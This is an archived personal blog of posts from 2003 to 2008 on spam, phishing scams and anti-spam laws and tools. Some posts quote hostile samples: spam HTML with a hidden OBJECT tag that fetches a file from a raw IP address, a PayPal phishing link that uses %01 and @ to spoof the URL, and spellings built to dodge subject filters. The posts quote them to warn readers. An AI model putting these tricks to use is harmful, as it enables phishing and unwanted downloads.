Recent SPAM Watch Posts



September 24, 2008

Unsubscription Links, Bad Webmonkey

This is really irritating to see in the footer of an email:

You are currently subscribed to %%list.name%% as: %%emailaddr%%.
To unsubscribe click here: %%url.unsub%%
or send a blank email to %%email.unsub%%

If you are at all familiar with the CAN-SPAM Act (and you should be) you should know that this is, in fact, a violation of that act.

Not only should you always provide a way to unsubscribe or opt-out, but it is a requirement by the CAN-SPAM Act. Someone's Webmonkey needs to fix what is broken.

February 26, 2008

Gotcha, CAPTCHA! Gmail bot detector system cracked

News from Ars:

The Gmail CAPTCHA has been cracked—albeit not easily—raising new concerns about spammers' ability to abuse Google's e-mail services. Websense Security Labs pointed out the security breach late last week, noting that spammers have a lot to gain by being able to use bots to automatically sign up for new accounts.

So, they have cracked the GMail CAPTCHA, with a 20% success rate. What is the world coming to?

January 28, 2008

A Note on Chain Letters

This is too funny not to post about. This kid I know, lets call him "Bob" sent me a chain letter yesterday. Now I don't know about you, but when I get chain letters I hit DELETE as soon as I can. And "Bob" helped me out, he put in the subject line: chain letter.

Today I get another email from "Bob" with the subject: this is yet another chain letter. You can guess what I did with both of those emails.

Not only that, he added about 50 email addresses to the TO field, including mine of course. So "Bob" I have some words of advice for you:

1) Learn the ways of the BCC field, it is your friend.
2) If you want anyone to read your chain letter, don't use "chain letter" in the subject.
3) Some people, but not me, will simply blacklist people who send them chain letters.
4) If you don't get it by now, people, myself included, hate chain letters.

September 16, 2006

Spamhaus fined $11.7 million; won't pay a dime

"As spamming is illegal in the United Kingdom, an Illinois court ordering a British organization to stop blocking incoming Illinois spam in Britain goes contrary to U.K. law which orders all spammers to cease sending spam in the first place."
Source: Ars Technica

A little long and convoluted, but funny as hell. Thanks Njiska for the link.

September 10, 2006

DevNerds.com Forums

The university must have sold their email list again, because on 8/31 I got a spam about some new forum, DevNerds.com. I finally went to check it out. I am sad to say it looks like a "me too" site based on the very successful Were-Here.

They have a section for "Computer Talk" and have Windows and Linux, but nothing for Mac OS. So I don't think I will be spending much time there.

So, why am I giving these forums the time of day? Well, the more forums the better. So good luck to DevNerds.

August 19, 2006

The Latest in Phishing Technology

I get phishing emails every day. Who doesn't these days. This one made me laugh. The first thing in the body of the email reads:

Information provided below will be transmitted via a secure socket layer connection !
If that wasn't funny enough, it was supposedly an email from PayPal, but had an eBay look to it. Some of these phishing emails do a good job of trying to fool you -- this was not one of them.

October 17, 2005

Quality link request: Superior Blinds

Tyler sent this to me a little while ago:

Hello,

I found your website www.breakingwindows.com on Google.

Your website has content related to ours at www.superiorblinds.co.uk. This is a quality website and will be well ranked on Google.

We are happy to upload a link onto this website in any way you request in exchange for a return link. I'm sure you appreciate that this would be of great benefit to us both.

To go ahead with this exchange please upload our link information below to your links page. Then reply to nick.sellman@superiorblinds.co.uk to say where you have uploaded it.

If you would like your return link presenting in a particular way please include this information in your email.

I will then arrange for your link to be uploaded and email you again the let you know.

Thank you.
Regards
Mindy

I get this kind of crap (read: spam) a lot, but none this funny.
I don’t know if you got this, but it made me laugh. It actually took me a few minutes to reason why a blinds company would want to link to BW. :) Tyler

October 3, 2005

Gone Phishin'

Crap on a crutch on a raft in the middle of the frigging Baltic Sea, when will this email phishin' shit stop? I just got one from "PayPal," the second PP fakie in the past couple weeks, and I really have to worry about the life skills of someone who tells me they'll have "no choise" but to "temporaly" suspend my account if I don't respond immediately and give them all my information.

Continue reading "Gone Phishin'" »

August 27, 2005

Three indicted in US spam crackdown

Three people accused of sending massive amounts of spam face possible prison sentences after being indicted by a grand jury in the U.S. state of Arizona and accused of violating the CAN-SPAM Act of 2003 and other charges, the U.S. Department of Justice said in a statement.
Source: MacCentral

So the CAN-SPAM Act actually caught someone. But why not nab the prOn peddlers who put up the money for the these spammers? Otherwise they will only go to another set of spammers.

August 9, 2005

Microsoft settles with 'Spam King' for $7 million

Microsoft Corp. has settled a lawsuit that it filed two years ago against the self-proclaimed "King of Spam," Scott Richter, who at one time helped distribute more than 38 billion unsolicited e-mails per year, Microsoft said Tuesday.
Source: MacCentral

Poor guy, he had to pay MS $7M. I hate spam. I don't feel bad for him.

August 3, 2005

Phishers Steal Trust from eBay Sign In Pages

Fraudsters have exploited a flaw in the eBay web site that allows them to orchestrate phishing attacks using eBay's own Sign In page.

Registered users of eBay's popular online auction web site must sign in using a username and password in order to participate in bidding and listing of items. A new style of phishing attack reported through the Netcraft Toolbar [which does not work on the Mac] community shows fraudsters exploiting flaws on the Sign In page and on another ancilliary page which results in victims being redirected to the fraudster's phishing site after they have logged in.

Source: Netcraft News

Using URL parameters is not new. Using the official page is. Spammers just found out how to use the redirect parameter in the URL. These login pages redirect to pages on that site usually, to your My eBay page for example. So it is not odd to have parameters in the URL. This is amazing, I did not think phishing could get any worse. It just got a lot worse.

It is hard enough to get non-techies to notice that the URL is not the official site, think how hard it is to explain URL parameters to them.

Incidentally, if you get phishing emails from eBay or PayPal, which are the most prevalent, you should send them to spoofs@ebay.com.

July 26, 2005

Russian Spammer killed

Sympathy? No? Didn't think so.

July 6, 2005

Worst Amazon SPAM yet

I have seen my fair share of Amazon.com spam over the years. Some of it is actually pretty clever. This one, however, it gets the prize for the worst ever:

Continue reading "Worst Amazon SPAM yet" »

April 4, 2005

With vigilantes on their heels, top spammers keep the e-mail flowing

NEW YORK -- Tom Cowles, who heads one of the world's largest bulk e-mail, or spam, businesses, ought to be a happy guy.

By his account, his company makes $12 million a year e-mailing billions of advertisements, mainly to folks who don't want them.

Source: The Detroit News

The reason I am posting this rather old article is because this guy lives here in Bowling Green. I got to talking with JD Pooley about SPAM, and he said he had to go shoot the picture for this article. Its pretty creepy, having a known spammer living in Bowling Green. He must get hell for it, and rightly should.

April 2, 2005

Microsoft bankrupts the Spam King

Scott Richter has filed for bankruptcy protection for his email marketing firm OptInRealBig.com, blaming a Microsoft lawsuit

Scott Richter, self-confessed Spam King and one-time peddler of ladies' underwear, has filed for bankruptcy, with Microsoft cited as the main reason.

Source: ZD Net UK

Yay!

February 7, 2005

Shmoo Group exploit: 0wn any domain, no defense exists

Pablos sez, "Shmoocon ended today. And just to prove The Shmoo Group wasn't sitting on their asses for the entire time while planning the con - A new exploit was demo'd by EricJ that left all jaws our on the floor. Want to own ANY domain? Want a trusted SSL cert for it? Check it out here. We 0wnz0rd PayPal, but left the rest for you. We have no idea how to fix this and neither do the browser developers. Official advisory here. Phishing attacks of doom coming soon."
Source: BoingBoing

Oh lord, this is just another fold in the phishing debacle. I found this interesting from the advisory:

VI. Vendor Responses

Verisign: No response yet.
Apple: No response yet.
Opera: They believe they have correctly implemented IDN, and will not be making any changes.
Mozilla: Working on finding a good long-term solution; provided clear workaround for disabling IDN.

You can read the full advisory for how to turn IDN off in Mozilla based browsers, as well as how exactly they have spoofed PayPal.com. And by all means, try out the proof of concept.

Thanks to Rob Griffiths for the link.

February 5, 2005

Study: Spam costing companies $22 billion a year

A telephone-based survey of adults who use the Internet found that more than three-quarters receive spam daily. The average spam messages per day is 18.5 and the average time spent per day deleting them is 2.8 minutes.

The loss in productivity is equivalent to $21.6 billion per year at average U.S. wages, according to the National Technology Readiness Survey produced by Rockbridge Associates, Inc., and the Center for Excellence in Service at Maryland's business school.

Source: CNN

I don't know about you, but I get exponentially more then 18.5 SPAM emails a day. Because of my SPAM filter I do however keep the time it takes to take care of that SPAM to under 5 minutes though, thank god!

What I would really like to see in one of these studies is more then 1000 people surveyed. Another wonderful fact they pulled out of this: 4 percent of the recipients have bought something advertised through spam within the past year.

Thanks people! You are the reason this "business model" works.

January 29, 2005

Germany proposes hefty fines for spammers

BERLIN, Germany (Reuters) -- People sending junk email, or spam, in Germany will face fines of as much as 50,000 euros ($65,190) according to a draft law agreed by Germany's ruling coalition of Social Democrats and Greens.
Source: CNN

Oh boy! Another promise. I doubt this is going to mean anything.

December 14, 2004

Fight against phishing moves to a new level

The announcement last week of a new antiphishing consortium that includes financial services firms, Internet service providers, IT vendors and law enforcement agencies represents one of the most concerted efforts yet to curb the growing problem of e-mail data-theft scams.
Source: MacCentral

November 21, 2004

Trial reveals spammer techniques

LEESBURG, Virginia (AP) -- As one of the world's most prolific spammers, Jeremy Jaynes pumped out at least 10 million e-mails a day with the help of 16 high-speed lines, the kind of Internet capacity a 1,000-employee company would need.

Jaynes' business was remarkably lucrative; prosecutors say he grossed up to $750,000 per month. If you have an e-mail account, chances are Jaynes tried to get your attention, pitching software, pornography and work-at-home schemes.

Source: CNN

Hmmmm.... Is it worth $750,000 a month? Most would say yes. But me? I would say yes.

November 4, 2004

North Carolina man sentenced to 9 years for spam

A North Carolina man was sentenced to nine years in prison for sending hundreds of thousands of unwanted e-mail messages, Virginia prosecutors said Wednesday.

Jeremy Jaynes of Raleigh was found guilty under a Virginia state law that sets limits on the number of e-mails marketers can send in a given time period and prohibits them from using fake e-mail addresses, Virginia Attorney General Jerry Kilgore said.

Source: C|Net News.com

Have a nice time in jail you moron. We need to hear about more spammers getting jail sentencing and outrageously high fines.

July 17, 2004

Financial aid scam targets students

The BGSU Office of Financial Aid is warning students of a scam in which a con artist impersonates a federal education official to gain access to information about students’ checking accounts. Financial Aid Director Craig Cornell said a letter describing the scam is being sent by email to BGSU students this week at the request of the U.S. Department of Education. Someone claiming to be a representative of the U.S. Department of Education is calling students, offering them grants, and asking for their bank account numbers so a processing fee can be charged. The caller claims he can replace the students’ federal loans with an $8,000 grant, and then obtains the student's checking account information. Source: BGSU Monitor I have not noticed such email, of course my BGNet email is 99.99% SPAM anyways.

June 23, 2004

AOL worker arrested in spam scheme

Jason Smathers is charged with stealing his employer's subscriber list and selling it. NEW YORK (CNN/Money) - A software engineer at America Online was arrested Wednesday and charged with stealing AOL's subscriber list and selling it to someone sending spam e-mail, federal prosecutors in New York said... Source: CNN Money I don't think a fine of $250,000 is enough, and I doubt these two idiots will see anywhere near 5 years in prison.

June 3, 2004

Network Associates is granted broad antispam patent

From The Laporte Report:
And yet another entry in the Annals of Greed... Paul Graham wrote his "Plan for Spam" advocating the use of Bayesian filters in August, 2002. In December, 2002, Network Associates applied for a broad-based patent on anti-spam technologies including, what a coincidence, Bayesian filters. The pathetic USPTO just approved that patent. No word yet on how NAI will apply their patent, but it could impact every spam program out there including numerous free open source programs like SpamBayes and Spam Assassin. Symantec and Postini also have patents on anti-spam techniques. Read the discussion on Slashdot.
What is the USPTO coming to? Patents are not patents any more. They are ideas. They are technologies. They are for phrases (You're Fired). Patents are not for inventions any more. I DON'T GET IT. I wonder how this will effect the products I use, SpamSieve and POPFile. I hope that Network Associates does not start suing/killing of the commercial, and more importantly the open source bayesian filtering softwares.

May 23, 2004

Phishing scourge prompts calls for change

The sentencing this week of a Texas man was a notable victory for the U.S. government in its fight against a form of online fraud known as "phishing." However, a recent surge in such scams highlights the need for more than customer education, with some computer security experts calling for major changes in the way sensitive information is exchanged online. Zachary Keith Hill, 20, was sentenced Tuesday to 46 months in prison after pleading guilty to defrauding America Online Inc. (AOL) and PayPal customers with a sophisticated online phishing con, the U.S. Department of Justice (DOJ) said. Source: MacCentral
That was a long article, even for MacCentral, but a good read, especially if you are unfamiliar with phishing. I am not sure that putting these people in jail are the answer, as this nation's jails are overcrowded as it is. I would much rather see the DOJ have obscene fines and actually enforce them. The DOJ also needs a higher convict-through rate though.

Continue reading "Phishing scourge prompts calls for change" »

May 20, 2004

Mail.app spam filter Explained

Many myths have emerged about Mail's junk mail filter. No, it's not an extremely complex set of rules, no it doesn't look for keywords, and no, it doesn't use white magic. To truly understand what makes it so much better than the competition, we'll have to take a closer look at the recognition engine and the technologies it relies on to do its work. It may sound a bit complex at first, but things will begin to make sense as we work through the mechanics. Source: Mac Dev Center I have long wanted to know how Mail's spam filter worked. I personally have seen much better results using SpamSieve and POPFile. I have used both heavily, either for myself or for my clients.

May 19, 2004

Wednesday reckoning day for porn spammers

E-mail users in the U.S. who have resigned themselves to being shocked by eye-popping pornographic messages in their inboxes can expect some relief Wednesday, when federal legislation governing sexually explicit unsolicited commercial ("spam") e-mail takes effect.

In April, the U.S. Federal Trade Commission (FTC) adopted the rule, part of the 2003 CAN-SPAM Act, which requires spam containing sexually oriented material to contain the label "SEXUALLY-EXPLICIT" in the subject line. The FTC likened the requirement to putting an electronic "brown paper wrapper" around raunchy spam. Spammers who ignore the law risk fines, the FTC said.

The rule is designed to protect e-mail recipients from graphic and unsolicited sexual images. The labels make it easier to spot and filter out such messages before they land in a recipient's in-box. In addition to the label, explicit spam must include a valid postal address for the sender, the FTC said....

The final rule, which goes into effect Wednesday, reflects feedback from the public on the label, which was originally supposed to read "SEXUALLY-EXPLICIT-CONTENT," but later shortened to allow more of the e-mail subject line to be readable, the FTC said.

Yes, please, reading the subject "13 yr. old Lolita" is very important. Give me a break.

Source: MacCentral


My grandmother is even been desensitized to prOn SPAM now. Although hearing her tell me about the first time she opened a porno SPAM was pretty funny. Poor grandma, she didn't know what she was getting into. No words of warning are enough for the unexacting grandparent.

When will this happen? I am not holding my breath. The sooner the better! Besides, do you realize how many alternates to "SEXUALLY-EXPLICIT" will be used? Lets take some guesses, shall we.

"SEXUALLY-EXPLICIT"

"S3XUALLY-3XPLICIT"

"SEXU@LLY-EXPLICIT"

"SEXUALLY-EXPL!C!T"

"S.E.X.U.A.L.L.Y.-E.X.P.L.I.C.I.T"

"S_E_X_U_A_L_L_Y_-_E_X_P_L_I_C_I_T"

"S E X U A L L Y - E X P L I C I T"

"S    EXUA  LLY-E  XPL   ICI  T"

"SEXUA  LLY-EX   PLICIT         df97s"

"!!SEXUALLY!!EXPLICIT!!"

"S[E]XUALLY-EXPLI[C]IT"

"SEXUA;;Y-EXPLICIT"

"SEXUALLY-EXPLI©IT"

"SéXUåLLY-EXPLICIT"

"SEXUALLY-EXPL1C1T

"Sexual:Explicit" (I got one of these today)

"SEXUALLY EXPLICIT" (I got one of these today)

See, they are not going to conform to a standard. I will add a few of these to SpamAssasin, and watch what all variations come through the pipe. I am very happy to see a few of my SPAMS even using this already. "Happy" and "SPAM" in one sentance, ugg!

May 18, 2004

Phishing scam reports skyrocket in April

Reports of a type of online crime known as "phishing" surged by almost 200 percent in April, according to figures from a computer security industry group. The Anti-Phishing Working Group (APWG) received reports of more than 1,100 unique phishing campaigns in April, a 178 percent increase from the previous month, according to figures shared with the IDG News Service. The reports represent a significant increase in phishing scams, which capture personal information from Internet users with a combination of unsolicited commercial ("spam") e-mail messages and Web sites designed to look like legitimate online businesses, said Dan Maier, director of product marketing at Tumbleweed Inc. and an APWG spokesman. Source: MacCentral
I have been meaning to mention this here. I have been getting a TON of phishing emails lately. I got 3 PayPal ones today! Not so much for the eBay (only a couple), but I have been getting Amazon ones now. That is new. I would say I have been averaging 10 phishing emails a week. The Amazon phishing ones do not pass my SPAM filter, but the PayPal and eBay ones cut right through POPFile. So those people doing the Amazon phishing - you are not doing a good job! These phishing SPAMS are not going to go away until people STOP FILLING IN THE BLANKS. If everyone would tell someone about these phishing SPAMS then maybe this would stop. But I do not see that happen. People will still get fooled, for some reason or another. This phishing happens for the same reason that normal SPAM happens. If one out of one 100, 1,000, 10,000 is successful, they are a success. Is SMTP Authentication the answer to all these SPAM related problems? I don't like playing the pessimist but I don't think SMTP Authentication will curb SPAM one bit. Now, I would love to see some kind of authentication or certificate system for email. I say this because we see how spammers get through even the smartest spam filters in the world. I have heard of spammers defeating Six Apart's TypeKey comment authentication system already. I have high hopes for a new standard secure email protocol. I am just not seeing a breakthrough yet to be optimistic about it yet. Please people, will you all tell your mother, brother, father, grandma, girlfriend, boyfriend, dog, whatever to be careful with "phishing" SPAM. They may have heard it all before, but it does not hurt to hear it again. And hopefully the more they hear it, the more they will think about telling others.

April 15, 2004

Stiff spam penalties urged

Spammers convicted under a recently enacted national antispam law could face stiff sentences under newly finalized government recommendations. The United States Sentencing Commission (USSC) said Tuesday that it sent Congress sentencing guidelines for the Can-Spam Act, short for Controlling the Assault of Non-Solicited Pornography and Marketing. Among the newly minted guidelines are added penalties for people convicted of sending spam using someone else's computer without permission or obscuring the message's real origin. Source: C|Net News.com I say cut off their fingers...if it works for The Mob it could work for SPAM.

FTC: Porn spam must be labeled

Pornographic spam will have to contain a warning in the subject line so Internet users can easily filter it out, the U.S. Federal Trade Commission said Tuesday. Starting May 19, sexually explicit e-mail will have to bear a label reading " Sexually-Explicit:" and the messages themselves will not be allowed to contain graphic material, the FTC said. Source: C|Net News.com

April 14, 2004

Maryland lawmakers pass antispam legislation

Maryland lawmakers passed new antispam legislation late Monday night, marking the first state to draft its own antispam laws since the federal Can-Spam Act was enacted. The legislation, which still awaits the signature of Maryland's governor, would make spamming a criminal offense, with penalties that could include up to 10 years of jail time, asset forfeiture and fines up to $25,000. Source: C|Net News.com More states need to do the same!

April 8, 2004

ACDSee SPAM

Ever since I read that Sports Illustrated article about their workflow, and went to the ACDSee web site, I have been hit with 3 SPAM emails. The latest is a newsletter, that I am subscribed to now. Is this a coincidence? I think not! But how are they harvesting my email address? I didn't fill anything out on their site. This last ACDSee email I got looks like an actual newsletter that someone would sign up for. The first two just looked like junk mail trying to sell the product to me. People should be shot for doing this. No, scratch that, the people who buy stuff from SPAM who make it a valuable marketing tool should be shot. Why shoot the messenger when you can go strait to the source. Maybe Sir William's crazy idea to buy stamps to send email would work. But then probably not since we all know that SPAM is a cost effective marketing trend. Bastards.

April 7, 2004

FWD: Re: Emails of eBay members [meancode.com@domainsbyproxy.com]

Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 X-Virus-Scanned: Norton X-Nonspam: Statistical 55% Hello: We are offering an email database which allows to contact eBay members (both sellers and shoppers). These are individuals that buy and sell items on the eBay auction. Please notice that 90% of eBay customers are also customers of PayPal. This database will be perfect for selling your products/services, because we are providing you unique prospects who purchase and sell more than anybody else! The data contains 408,000 records, which include personal email addresses only. The records cover ALL categories listed on eBay. The database will be delivered to you in any format of your choice (Excel, ASCII, CSV, etc.). By default it is provided in a 4.4MB TXT file. The data was collected in the period of last 2 months and will be updated quarterly. The price we are asking is $360. To place the order please fill out the form: http://www.gmthost.com/ebay.php To contact me please email to info@gmthost.com (THIS EMAIL ONLY! DO NOT 'REPLY'). Please notice that we also maintain a list of eGold sellers. Best, Tom Theroux (yasuhiro@wongfaye.com) This one got through POPFile... And yes, the X headers were inside the mail body. My eBay name is meancode.com, so they seem to have the names and email addresses. Now how many stupid people are going to buy this list? Its not as if I do not get enough SPAM posing as PayPal emails, how fun, now I will get even more! The sad part here is people are too easily fooled by these scams. As a side note, the payment page is not running SSL. Also, it is safe to say that I will not be looking to GMT Time Host to be hosting any of my sites.

April 1, 2004

'Buffalo Spammer' found guilty of forgery

A New York state man who sent out millions of spam e-mails faces up to seven years in prison after he was found guilty of identity theft and forgery charges, the state attorney general's office said Thursday. Howard Carmack, known as the "Buffalo Spammer," was found guilty by a Buffalo jury on 14 counts of identity theft and forgery, a spokesman for New York Attorney General Eliot Spitzer said. Carmack sent out 825 million bulk e-mail messages using stolen identities and forged addresses, the state charged. Source: C|Net News.com You know what I say, fry the spammers! No no, putting them in jail is just fine in my book.

March 30, 2004

Spammer's Porsche up for grabs

Internet giant AOL has ratcheted up the war against unsolicited e-mail with a publicity-grabbing coup - an online raffle of a spammer's seized Porsche. AOL won the car - a $47,000 Boxster S - as part of a court settlement against an unnamed e-mailer last year. Source: BBC News

March 23, 2004

display:none SPAM

The new super cool chic thing to do with SPAM is to use CSS and the display:none proporty on pretty much every block element known to man, including the ever fun OBJECT tag. Don't get me started on ActiveX, thats another story all together. By the way, this is why you hear so many people, including me, rant to not enable HTML in your email client. What am I blabbering about? Take a look: <html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://66.183.208.158:81/497379.php"> </OBJECT>
</body></html> Since I am the curious type, and I am using a Macintosh (do not try this yourself on a PC running Windows, you have been warned) I actually loaded up that URL. This URL is dead by now, just take my word for it. This automatically downloaded a file on my Mac. I can only predict what would have happened if I did this on my PC. SPAM filters need to be updated for this trick. I am not sure if SpamSieve will pick up this trick, but I know for sure the latest version of POPFile (of which I outlined how to install on OS X) will in fact learn and catch this trick. This was one of the major new features. I need to email the developers of DSPAM and SpamSieve to see if their systems will accurately classify this new trick. I hope they both do. I have been meaning to write about it, but I have, after many months convinced Digital Partners (DP) to install SPAM blocking software on their mail servers. The amount of SPAM on our BG News lists was getting counterproductive. DP finally decided on DSPAM after conducting research. In short I am very happy with DSPAM. So check out DSPAM!

March 6, 2004

Spam is 10 Years Old

Today (5 March) marks the tenth anniversary of what is generally considered the first spam message. On this day in 1994, US law firm Canter and Siegel posted a message on several Usenet newsgroups advertising its services to people interested in participating in the US Green Card lottery. These days we'd barely bat an eyelid at such a message but at the time it was considered as appalling breach of "netiquette" - the unspoken rules of polite behaviour online. It was the cyber equivalent of trying to sell cellophane-wrapped roses in the middle of a crowded pub while the footy is on the TV. Source: The Register

February 21, 2004

How Much SPAM do you receive these days?

SPAM is getting worse and worse. The Canned Spam law is not working, or if it is, I am not seeing its benefit. So tell me (vote in my poll) what percentage of your email is spam. My POPFile statistics say 85.60% of my mail is SPAM. The filter is 99.13% accurate at distinguishing that SPAM. I have not had to worry about a false positive in months, I just have to classify emails that POPFile is unsure of (it leaves them as unclassified, which means it doesn't count in the classification error tally).

February 13, 2004

Don't Fall for New 'Don't Spam' Scam

We all hate unsolicited e-mails, or spam. It's time consuming, offending, and at times, dangerous. The U.S. government has passed the CAN SPAM bill, but it is still being debated whether it really addresses the problem. So an opportunity to sign up for a national "don't spam me" list sounds pretty good, right? Wrong. Source: ABC News I give them credit for making a faithful parody of the REAL Do Not Call web site. What is sad is the (what I imagine) alarming amount of people who signed up for just more SPAM today. People need to be educated about this stuff.

February 10, 2004

Bleeping Telemarketers

This is the second time in 3 months I have received a telemarketing call on my phone, my cell phone. I just now got one trying to sell me an HGH product. I can't remember what the last one was about. I have received telemarketing calls on my cell, but those have been solicited, and expected. The two I am referring to were very non solicited calls. It should be against the law for telemarketers to call a cell phone. It still is not. Although some places are stricter then others. The one call I got the lady hung up right away when I said this was a cell, the other was a stupid drone that didn't seem to care. So do I put my cell phone on the "Do Not Call" list? I guess so. One of the main reasons I got a cell phone and got rid of the land line was to get away from telemarketers. Of course the current rate is better then 2-3 a week. But still, I have to pay for those bastards calls. OK, I have calmed down, and changed the title of this post :-P.

February 4, 2004

POPFile Hits 99 Percent

A picture is worth 1,000 words. And in the world of SPAM control I would have to say at least 27,429 (number of words in my SPAM bucket). I first installed POPFile at the end of October. So this number comes after 3 full months of use. 99% is such a nice number. I have not had a false positives in over a month, I just have had to add more SPAM to the corpus.
popfile_99.gif

January 27, 2004

MyDoom Slows Web Performance

As the fastest-moving e-mail worm continues to haunt inboxes, it is creating some hiccups in response times on the Internet. But the real danger could lie in MyDoom's "time bomb" set to trigger a denial of service attack next month against the SCO Group Inc.'s Web site, experts say. Source: eWeek The amount of spam I am getting now is up at least 100%, but I am happy to say that POPFile is handling it all very well, also at 100% in fact.

January 24, 2004

Another PayPal Scam

I do not understand why people can be fooled by this stuff, but from the amount of articles I have read, people have been fooled. Even with the authentic looking email, why would you even think that PayPal would email you asking to input your sensitive data again? That is just beyond me. This time the site was taken down before I got this email, that went something like this: Dear paypal user, We would like to inform you that we are upgrading our server to install a better protection software. So please click here and fill in the registration form again to renew your account. Paypal Administration. With a link that looks like this: http://www.paypal.com%01%01%01%01% ... @211.54.126.187/f/ Of with you get this: This site has been suspended by network administrator. If you are the owner of this domain, please open a My Website has been Suspended Support Ticket for further information. Please include the domain name which has been suspended. If you are a visitor, please visit this site again later. I am glad to see this one was down before the emails got sent out. Unfortunately this is not often the case. As a matter of fact, this is the first time I have seen the site down when I went to it. On a related note (related to Windows IE) we still don't have a fix for that 'phishing' bug that will allow a web page to spoof the URL. I think I read it will be in next month's bug fixes. That @ is what does it. I seem to remember CNN.com spoofing a few years back that did this as well. The thing is, the %01 is what is the bug in WinIE, so Outlook users would not know either, as Outlook uses WinIE to render the HTML in your email. Be sure to read the comments on this post over at BlogCritics.

January 19, 2004

Worsening spam epidemic chokes the net

The scourge of junk email reached new proportions at the end of 2003 with nearly two out of every three messages sent worldwide being an unwanted advertisement. The latest statistics from UK-based email filtering company MessageLabs indicate that 62.7 per cent of all global emails sent during December were spam. The company scanned over 463 million messages. In November the figure was 55.1 percent and in October 50.5 percent. In some countries, for example Australia, more than two thirds of all December messages were junk. Source: NewScientist.com

December 29, 2003

Congress says it hates spam (except its own)

Even as Congress was unanimously approving a law aimed at reducing the flow of junk e-mail, members were sending out hundreds of thousands of unsolicited messages to constituents. The spasm of activity is aimed at attracting voluntary subscribers to the lawmakers' e-mail lists, which would not be subject to House rules that normally impose a 90-day blackout before an election for taxpayer-supported Congressional mass communications. Source: New York Times

November 30, 2003

I just love ICQ SPAM

229040368 (7:15:52 PM): Hello friend... I want say to you about Cyalus! 229040368 (7:16:03 PM): This generic brand of Cyalis is an emerging tablet-based oral treatment for impotency & erectile dysfunction (ED) which is now available for you to buy online. It is proving highly successful in clinical trials and is generating major interest as a real alternative to other Sildenafil-based medications. Cyalus also works much faster than Sildenafil-based medications. In clinical trials, the majority of men who took the drug were able to engage in sexual intercourse within 30 minutes or less. The studies also indicated that Cyalus stays in the system for up to 30 hours. 229040368 (7:16:06 PM): Authorize add to list request 229040368 (7:16:14 PM): Authorize add to list request 229040368 (7:16:22 PM): If you are interesting add me to your contact list, I will say more information 229040368 (7:16:35 PM): Excuse for troubling... But if you will have troubles with potency, add me to your contact list, and I will send solutions for you! 229040368 (7:17:18 PM): Excuse for troubling... But if you will have troubles with potency, add me to your contact list, and I will send solutions for you! 229040368 (7:17:26 PM): Come here and find more infromation: http://www.potirt.com/
I have never seen it so persistent, especially after I deny authorization twice. 229040368 can be blocked. I think I am going to start a list of these to block, and this is the first one. There are 4 or 5 I should have blocked at the time, but did not think about it.

November 23, 2003

Paris Hilton's Steamy Home Movie

Reports have surfaced of a steamy sex video, featuring 22-year-old Hilton, which could soon be available on the Internet la Tommy and Pamela's infamous romp. Shot about three years ago, the tape features the then-barely legal celebutante getting X-rated with Shannen Doherty's on-again, off-again husband Rick Solomon, 33.
Source: Yahoo News Haven't you seen the SPAM for this? Well why pay when Consumption Junction has it for all the world to see? Now I shouldn't have to say this, but this is not fit for viewing at work (or if you are under the age of 18, for that matter)! Green Breans If you can't figure out where the link is, you are obviously not determined enough. You are a sick bastard, you know that? How could you? Why would you? Have you no shame? You are just like the rest of us, eager to watch. You know you are, don't deny it! MUA HA HA HA HA! Should we feel sorry for Paris? What has this done for her? What do people know of Paris? They know she is a model, and a party hearty celeb. This is only going to help her. She gets her name and photos on magazine covers and spreads all over the world. How is this going to hurt her?
I take as a given that Ms. Hilton's recent escapade, as noted at Fleshbot (not work safe) and elsewhere, does not represent any fundamental new ground for the young lady. When you devote your life to being watched: to being observed, the step that you take when finally allowing that observation to extend to your most intimate --- or at least, most explicit --- moments is not a particularly bold one. When put in the context of her past behavior, the act is different only in degree, not in kind. But observing Ms. Hilton (no, not observing her do that, but more generally) makes me wonder about a personality so in need of attention from others. She yearns for the spotlight; for the eyes of the world to focus on her for a moment, and, if possible, longer. She seeks notice wherever she can find it; basking in the radiance of strangers' gazes and thoughts. Where once, we can assume, she sought such attention a source of approval, a validation of her own worth, now, the notice itself has become the end. Positive or negative; embarrassing or flattering, whatever keeps her in the spotlight is by definition good.
Source: Blogcritics.org

November 1, 2003

Comment SPAM

There is nowhere that is safe from SPAM. I knew I would be getting comment SPAM in my blog sometime, it was just a question of when. Today was the day. Bastards. There is IP banning in the MT preferences, but people have gotten more proactive about comment spam. There is the MT-Blacklist plugin, which I will now be installing. Even Six Apart has blogged about comment SPAM. MT-Blacklist is installed, and is very nice. If you do not have this plugin installed, i suggest you install and configure it. Thanks to Jay Allen for a great addition to the MT community

October 30, 2003

POPFile Installed on OS X

I cannot express in words how happy I am. A picture is worth a thousand words right? How many words is a dynamic picture worth? Using these instructions you too can be as SPAM free as I, all while running Mac OS X. Special Thanks to Neil Lee on his help on the config.in file. Just a warning. This requires the instillation of the Developer Tools, which comes with OS X these days. The new version of POPFile uses the BerklyDB perl module, these files need to be compiled. But don't fret, this is very easy to do even if you are a nOOb at the command line. If all goes well you can just copy the commands from Neil's site and paste them into the Terminal. The end result is more then worth the hassle. Let me say that again. The end result of running POPFile on Mac OS X is more then worth the hassle of compiling some files in the command line. Why? POPFile offers a superior bayesian SPAM filtering system with "buckets" and "magnets" to provide the best SPAM filtering system known to man. Mac OS X Mail does not have bayesian filtering in it (score one for Outlook 2003, that is IF you want to pay the steep upgrade fee) and that is not good enough for me. Mac OS X Mail is pretty good after you train it for a while. But it is nowhere near as accurate as using POPFile. I have used POPFile for a full 8 months on my PC, and it got up to 99% accurate, and to the point to where there were NO false positives. SpamSieve is an option, but it does not work with Mail (It works with IMAP but not POP). You also have to use AppleScripts to identify what is SPAM and what is real mail. I used this app back when I used Entourage X. I did not like this AppleScript solution. Not one bit. SpamSlam is also a pretty good app to kill SPAM. I tried SpamSlam, it is not that bad, but the setup of this app is a lot. Both of these solutions are good. They both employ bayesian filtering. They both have nice clean instillations. They are both not worth it. Not in comparison to POPFile. No disrespect to SpamSieve or SpamSlam here. Did I mention POPFile is free, and open source (and is in very active development). Oh, you are still cringing at the command line stuff? Stop your whining and get your hands a little dirty in the Terminal. Stopping SPAM is worth it. This is the first part in a multipart series on POPFile and Mac OS X. Next I will discuss installing POPFile and setup of Mail and Entourage X to work with it. If you can't wait, follow these instructions for a very clear step by step how-to. UPDATE 11/05/03 Michael Artz has instructions for setting this up as well, but I emailed him saying they did not work, this is because the instructions were not for the new version of POPFile. Michael just emailed me saying that his instructions are updated. Although Michael claims otherwise, both sets of instructions do in fact have a downloadable StartupItem. Michael does have a full explanation about creating the StartupItem by 